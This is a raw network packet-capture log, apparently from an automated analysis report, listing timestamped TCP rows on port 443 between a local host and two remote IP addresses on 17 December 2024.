                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.343498945 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.343565941 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.343866110 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.343931913 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.398705959 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.398761988 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.445595026 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.890794039 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.890836000 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.890894890 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.891005039 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.891025066 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.891083002 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.892256021 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.892301083 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.892371893 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.068919897 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.068980932 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.069020987 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.069047928 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.069053888 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.069089890 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.069109917 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.077151060 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.077227116 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.077249050 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.093404055 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.093458891 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.093491077 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.103022099 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.103099108 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.103130102 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.119520903 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.119677067 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.119741917 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.120754004 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.120774984 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.147993088 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.188355923 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.241841078 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.241874933 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.260798931 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.261462927 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.261492968 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.271636009 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.271738052 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.271756887 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.281207085 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.281308889 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.281330109 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.294605970 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.298634052 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.298655033 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.306763887 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.306838036 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.306857109 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.320987940 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.321070910 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.321093082 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.334841013 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.335274935 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.335295916 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.347893000 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.350632906 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.350657940 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.357995987 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.358067989 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.358100891 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.378962994 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.379163027 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.379195929 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.386094093 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.386610031 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.386641979 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.397396088 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.398648024 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.398682117 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.445189953 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.452599049 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.454863071 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.458662033 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.458692074 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.463685036 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.463804960 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.463892937 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.463922024 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.463972092 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.476814032 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.490072012 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.490111113 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.490137100 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.490170956 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.490609884 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.501943111 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.514002085 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.514121056 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.514149904 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.524836063 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.524929047 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.524952888 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.536736965 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.536815882 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.536892891 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.536921024 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.536983967 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.547243118 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.557111025 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.557163954 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.557187080 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.567666054 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.567704916 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.567718983 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.567742109 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.568828106 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.577708960 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.588010073 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.588056087 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.588068008 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.588092089 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.588206053 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.597182989 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.606482029 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.606595039 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.606610060 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.606626034 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.606687069 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.615149975 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.624166012 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.624207973 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.624243021 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.624314070 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.624442101 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.625403881 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.633944035 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.634001970 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.634023905 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.642663002 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.643003941 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.643024921 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.648420095 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.648475885 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.648485899 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.657759905 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.657826900 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.657845020 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.660969973 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.661021948 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.661036968 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.664997101 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.665049076 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.665060997 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.670748949 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.670869112 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.670877934 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.676050901 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.676101923 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.676110983 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.681677103 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.681730032 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.681740046 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.687077045 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.687226057 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.687233925 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.694580078 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.695517063 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.695533037 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.697200060 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.697290897 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.697308064 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706449986 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706521034 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706536055 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706737041 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706779003 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:24.706842899 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.774228096 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.774286032 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.774375916 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.774720907 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:25.774738073 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:26.823158026 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.183599949 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.183676958 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.184355021 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.184365988 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.186709881 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.186718941 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.358366966 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.358412981 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.358479977 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.358717918 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:27.358731985 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.226361990 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.226457119 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.226488113 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.226526976 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.227489948 CET49833443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.227507114 CET44349833116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.383608103 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.383667946 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.383747101 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.383956909 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.383974075 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.779786110 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.781577110 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.782063007 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.782079935 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783843040 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783850908 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783906937 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783919096 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783926964 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.783941031 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.784039974 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.784073114 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.785938025 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.785969019 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789752007 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789767981 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789787054 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789793015 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789918900 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789944887 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789953947 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789954901 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.789980888 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.790064096 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:28.790087938 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.808226109 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.808342934 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.808834076 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.808840990 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810595989 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810601950 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810715914 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810735941 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810827971 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810849905 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810940027 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:29.810956001 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:30.652503967 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:30.652590036 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:30.652703047 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:30.653599977 CET49843443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:30.653640985 CET44349843116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.342924118 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.342994928 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343013048 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343025923 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343060017 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343077898 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343887091 CET49844443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.343903065 CET44349844116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.542758942 CET49855443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.542785883 CET44349855116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.542891979 CET49855443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.543153048 CET49855443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:31.543165922 CET44349855116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.561314106 CET49856443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.561357975 CET44349856116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.561501980 CET49856443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.561631918 CET49856443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.561644077 CET44349856116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.950416088 CET44349855116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.950640917 CET49855443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.951020956 CET49855443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:32.951036930 CET44349855116.203.12.114192.168.2.4
